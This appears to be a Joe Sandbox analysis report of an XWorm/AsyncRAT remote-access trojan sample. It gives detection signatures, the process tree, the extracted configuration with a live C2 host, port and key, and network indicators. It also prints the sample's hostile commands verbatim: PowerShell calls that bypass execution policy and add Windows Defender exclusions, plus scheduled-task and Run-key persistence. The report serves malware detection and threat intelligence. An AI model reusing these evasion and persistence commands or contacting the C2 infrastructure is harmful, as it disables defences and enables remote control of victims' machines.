Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aZDwfEKorn.exe

Overview

General Information

Sample name:aZDwfEKorn.exe
renamed because original name is a hash value
Original sample name:803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca.exe
Analysis ID:1575207
MD5:cc052d76ffa12621e3a1faac9a71aa2a
SHA1:0700e214d49944a83a141dbb5c982bbf8efe2d3f
SHA256:803c3419bd5a171884ff51f1d75ce521a505e817fd42f1d52ac0de3c33f6dfca
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • aZDwfEKorn.exe (PID: 5900 cmdline: "C:\Users\user\Desktop\aZDwfEKorn.exe" MD5: CC052D76FFA12621E3A1FAAC9A71AA2A)
    • powershell.exe (PID: 5408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aZDwfEKorn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\boost' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boost' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7944 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boost (PID: 8088 cmdline: C:\Users\user\AppData\Roaming\boost MD5: CC052D76FFA12621E3A1FAAC9A71AA2A)
  • OpenWith.exe (PID: 5200 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OpenWith.exe (PID: 1272 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • boost (PID: 1532 cmdline: C:\Users\user\AppData\Roaming\boost MD5: CC052D76FFA12621E3A1FAAC9A71AA2A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["audio-clouds.gl.at.ply.gg"], "Port": 28408, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
aZDwfEKorn.exeJoeSecurity_XWormYara detected XWormJoe Security
    aZDwfEKorn.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x87a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8841:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8956:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x841c:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\boostJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\boostMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x87a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8841:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8956:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x841c:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x85a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8641:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x8756:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x821c:$cnc4: POST / HTTP/1.1
        Process Memory Space: aZDwfEKorn.exe PID: 5900JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.aZDwfEKorn.exe.d30000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.aZDwfEKorn.exe.d30000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x87a4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x8841:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x8956:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x841c:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boost, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\aZDwfEKorn.exe, ProcessId: 5900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boost
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\boost, CommandLine: C:\Users\user\AppData\Roaming\boost, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\boost, NewProcessName: C:\Users\user\AppData\Roaming\boost, OriginalFileName: C:\Users\user\AppData\Roaming\boost, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\boost, ProcessId: 8088, ProcessName: boost
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\aZDwfEKorn.exe, ProcessId: 5900, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnk
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost", ProcessId: 7944, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aZDwfEKorn.exe", ParentImage: C:\Users\user\Desktop\aZDwfEKorn.exe, ParentProcessId: 5900, ParentProcessName: aZDwfEKorn.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\aZDwfEKorn.exe', ProcessId: 5408, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1476, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-14T18:53:51.009659+010028559241Malware Command and Control Activity Detected192.168.2.749887147.185.221.2428408TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: aZDwfEKorn.exeAvira: detected
            Antivirus detection for URL or domain
            Source: audio-clouds.gl.at.ply.ggAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\boostAvira: detection malicious, Label: TR/Spy.Gen
            Found malware configuration
            Source: aZDwfEKorn.exeMalware Configuration Extractor: Xworm {"C2 url": ["audio-clouds.gl.at.ply.gg"], "Port": 28408, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\boostReversingLabs: Detection: 81%
            Multi AV Scanner detection for submitted file
            Source: aZDwfEKorn.exeReversingLabs: Detection: 81%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\boostJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: aZDwfEKorn.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: aZDwfEKorn.exeString decryptor: audio-clouds.gl.at.ply.gg
            Source: aZDwfEKorn.exeString decryptor: 28408
            Source: aZDwfEKorn.exeString decryptor: <123456789>
            Source: aZDwfEKorn.exeString decryptor: <Xwormmm>
            Source: aZDwfEKorn.exeString decryptor: f9t group
            Source: aZDwfEKorn.exeString decryptor: USB.exe
            Source: aZDwfEKorn.exeString decryptor: %AppData%
            Source: aZDwfEKorn.exeString decryptor: boost
            Source: aZDwfEKorn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: aZDwfEKorn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49887 -> 147.185.221.24:28408
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: audio-clouds.gl.at.ply.gg
            Source: global trafficTCP traffic: 192.168.2.7:49826 -> 147.185.221.24:28408
            Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: audio-clouds.gl.at.ply.gg
            Source: powershell.exe, 00000007.00000002.1367393487.000001A12C853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m:t
            Source: powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
            Source: powershell.exe, 0000000B.00000002.1458245262.00000297A5FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
            Source: svchost.exe, 00000018.00000002.2528359798.000002A272A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.24.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.24.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: powershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: aZDwfEKorn.exe, 00000000.00000002.2528923566.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.1342572886.000001A1142A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978DA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D995A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000007.00000002.1366608931.000001A12C706000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1931766181.0000027827A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: powershell.exe, 00000010.00000002.1935684002.0000027827BA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: powershell.exe, 00000007.00000002.1342572886.000001A114081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1393262886.000002978D801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1502426529.00000225D9731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1722435612.000002780F4D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: edb.log.24.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
            Source: svchost.exe, 00000018.00000003.2075055763.000002A272920000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.dr, edb.log.24.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
            Source: powershell.exe, 00000010.00000002.1722435612.000002780F6F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000007.00000002.1360053265.000001A1240F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1442850240.000002979D871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1629972370.00000225E979E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1905721208.000002781F53D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: qmgr.db.24.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: aZDwfEKorn.exe, XLogger.cs.Net Code: KeyboardLayout
            Source: boost.0.dr, XLogger.cs.Net Code: KeyboardLayout

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: aZDwfEKorn.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.aZDwfEKorn.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Roaming\boost, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeCode function: 0_2_00007FFAAC587D760_2_00007FFAAC587D76
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeCode function: 0_2_00007FFAAC5812B90_2_00007FFAAC5812B9
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeCode function: 0_2_00007FFAAC588B220_2_00007FFAAC588B22
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeCode function: 0_2_00007FFAAC580F100_2_00007FFAAC580F10
            Source: C:\Users\user\Desktop\aZDwfEKorn.exeCode function: 0_2_00007FFAAC581C4D0_2_00007FFAAC581C4D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC6730E911_2_00007FFAAC6730E9
            Source: C:\Users\user\AppData\Roaming\boostCode function: 22_2_00007FFAAC5A12B922_2_00007FFAAC5A12B9
            Source: C:\Users\user\AppData\Roaming\boostCode function: 22_2_00007FFAAC5A1C4D22_2_00007FFAAC5A1C4D
            Source: C:\Users\user\AppData\Roaming\boostCode function: 26_2_00007FFAAC5812B926_2_00007FFAAC5812B9
            Source: C:\Users\user\AppData\Roaming\boostCode function: 26_2_00007FFAAC581C4D26_2_00007FFAAC581C4D
            Source: aZDwfEKorn.exe, 00000000.00000000.1255996540.0000000000D32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLoad.exe4 vs aZDwfEKorn.exe
            Source: aZDwfEKorn.exeBinary or memory string: OriginalFilenameLoad.exe4 vs aZDwfEKorn.exe
            Source: aZDwfEKorn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: aZDwfEKorn.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
